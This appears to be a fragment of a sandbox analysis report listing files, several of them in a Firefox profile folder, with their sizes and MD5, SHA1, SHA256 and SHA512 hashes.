MD519be8e9d1023c81792a26384ea51ccc9
SHA1e34af3d102e340b8b4d8aca8236886d4d3949cea
SHA25625e302628eab2691baf82a573e8ef4e7f9d6806bd25b82dd831eb2d3e0f316d9
SHA5123b6c43a84d1ffe02a5740135a90e3ea399c082c23caca207f2d49fd345d112b063c5a6975d356962921f18db207dc8d7a741bd6c1c05b06892c1848b088a30d2
-
Filesize
6KB
MD52dd73ab557688f3e9b42f3e8a6f01a07
SHA1c72f0ba3adc592ae91caba3e796f6ab65d4fd490
SHA256032eb868986748749d515224e4e5000028b51f7be06abc86fb7e8e5d60d191a4
SHA5120628b45ed0ae5e2bb44a672ab63d4af125b0fc001fff64ac518ece2d9678d82969191043a7ac330421cc3c43a9357039851a7708e725e3dfdebf8e103e13dc1c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD581e3b81a0bd0612a7b8e7678e301b56c
SHA105db102ac75e76726b47836d356de559bb3bf480
SHA25670718391caed391f194355a769d5b37a7740a1c7fd8c057bc77dfd58ff7b8dd6
SHA5128164c62f432ce3bd90d84f5c4a724fc6b8bfb3a2e90cdd0460682328e2e45fc8dc703d03dec3d4c65678f4893db7ad87a838ab6d09edfcc5f6ff607b8f633f45
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.3MB
MD59a8b80fc21aa635db32b61b701d7e922
SHA10fc501b4fe78640a1ff79bebf947d38acd65aca7
SHA256663560d960a72bbc80e9599f24e79f6a90fc20480d40583896ffac1f530e97de
SHA51203e6d067e640dd31d5284f50ef23e7ab9f69090cc64033042bd4c50a2393331d1075df11bc8aa2ccbe1e3a03de620fabfb0a2fe30581287332069b6d4ed52ce2
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f